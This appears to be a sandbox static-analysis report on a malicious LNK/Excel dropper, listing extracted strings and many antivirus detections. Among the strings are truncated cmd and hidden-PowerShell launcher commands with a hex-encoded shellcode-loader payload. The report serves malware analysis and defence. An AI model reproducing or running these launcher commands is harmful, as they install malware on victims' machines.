Static | ZeroBOX
No static analysis available.
%windir%\SysWOW64\cmd.exe
docProps/app.xml
docProps/core.xml
*}z^LQ
xl/activeX/activeX1.bin
xl/activeX/activeX1.xmle
xl/activeX/_rels/activeX1.xml.relsm
>OO/`
xl/drawings/drawing1.xml
xl/drawings/vmlDrawing1.vml
\rFa1Ps
xl/printerSettings/printerSettings1.bin
>%8JF))
xl/sharedStrings.xml
xl/styles.xml
hBC~(p
xl/theme/theme1.xml
A Vj)t
$*b?a#
0$%|v&+
xl/workbook.xml
3C.R"a(
H(!Y{d
8}Y<zR
xl/worksheets/sheet1.xml
M^L&C5
.{sRhIB
FqDc>.'
"e_{p0
;M9Es@
Cqbt]r
p)QQUb
6aMt>x
5$">%5V6
e=C`$nn
xl/worksheets/sheet2.xml
aqsr?[
_5o]5W]
`TiWeZ
FZsD
\CpJ&P
-2Rv"dK
xl/worksheets/sheet3.xml
BcF(OA
/S;'(j`W
PbU3R
w$cw=@
wn04%'
758eR$
+KF++F+gr;
.<PRF32R
`hB5UGX6
xl/worksheets/sheet4.xml
yrKxoS
S%:,bN
P+AZ*&-n*
`FZT0$h%
k]6sqL
8Vq*2!
>,&w?
xl/worksheets/sheet5.xml
V/9G{w7
6u;}Z4
qY|T%,
\XIAX)1e
!O#qhe
.I|2F]%
H*5Q#G
w0yq-1ha
)4"9$f
{Y.`0I
1atSSNUQ*
NqnMDTEY/+
Ff=MQ>`!
DKYY-4wA
xl/worksheets/_rels/sheet5.xml.rels
`U]^,
xl/_rels/workbook.xml.rels
[Content_Types].xml
oF^JmN
_rels/.rels
docProps/app.xmlPK
docProps/core.xmlPK
xl/activeX/activeX1.binPK
xl/activeX/activeX1.xmlPK
xl/activeX/_rels/activeX1.xml.relsPK
xl/drawings/drawing1.xmlPK
xl/drawings/vmlDrawing1.vmlPK
xl/printerSettings/printerSettings1.binPK
xl/sharedStrings.xmlPK
xl/styles.xmlPK
xl/theme/theme1.xmlPK
xl/workbook.xmlPK
xl/worksheets/sheet1.xmlPK
xl/worksheets/sheet2.xmlPK
xl/worksheets/sheet3.xmlPK
xl/worksheets/sheet4.xmlPK
xl/worksheets/sheet5.xmlPK
xl/worksheets/_rels/sheet5.xml.relsPK
xl/_rels/workbook.xml.relsPK
[Content_Types].xmlPK
_rels/.relsPK
start /min c:\\Windows\\SysWOW64\\cmd.exe /c for /f "tokens=*" %%a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell.exe /s /b /od') do call %%a -windowstyle hidden -command "$red ="$yellow="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D5061
/k echo SET a=power>C:\Users\Public\282310.bat&&echo SET b=shell.exe>>C:\Users\Public\282310.bat&&echo SET M=%a%%b%>>C:\Users\Public\282310.bat&&echo call %M% -windowstyle hidden "$dirPath=Get-Location;if($dirPath -Match 'S
%windir%\SysWOW64\cmd.exe
Antivirus Signature
Bkav Clean
Lionic Trojan.WinLNK.Agent.4!c
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh BehavesLike.Trojan.vx
McAfee Clean
Malwarebytes Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Arcabit Heur.BZC.YAX.Pantera.117.8C5C9C7D
BitDefenderTheta Clean
VirIT Clean
Symantec CL.Downloader!gen119
ESET-NOD32 a variant of Generik.FMGYVKU
TrendMicro-HouseCall Clean
Avast LNK:Agent-HS [Trj]
Cynet Clean
Kaspersky HEUR:Trojan.WinLNK.Agent.gen
BitDefender Heur.BZC.YAX.Pantera.117.8C5C9C7D
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Clean
Tencent Clean
TACHYON Clean
Emsisoft Heur.BZC.YAX.Pantera.117.8C5C9C7D (B)
Baidu Clean
F-Secure Clean
DrWeb Clean
VIPRE Heur.BZC.YAX.Pantera.117.8C5C9C7D
TrendMicro Clean
FireEye Heur.BZC.YAX.Pantera.117.8C5C9C7D
Sophos Troj/LnkDrop-M
Ikarus Clean
Jiangmin Clean
Google Detected
Avira Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Microsoft TrojanDownloader:PowerShell/MoniSaint.C!dha
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.WinLNK.Agent.gen
GData Heur.BZC.YAX.Pantera.117.8C5C9C7D
Varist Clean
AhnLab-V3 Dropper/LNK.Generic.S2373
Acronis Clean
VBA32 Trojan.Link.Crafted
ALYac Trojan.Agent.LNK.Gen
MAX malware (ai score=88)
Zoner Clean
Rising Clean
Yandex Clean
SentinelOne Static AI - Suspicious LNK
Fortinet Clean
AVG LNK:Agent-HS [Trj]
Panda JS/BondatN.gen
No IRMA results available.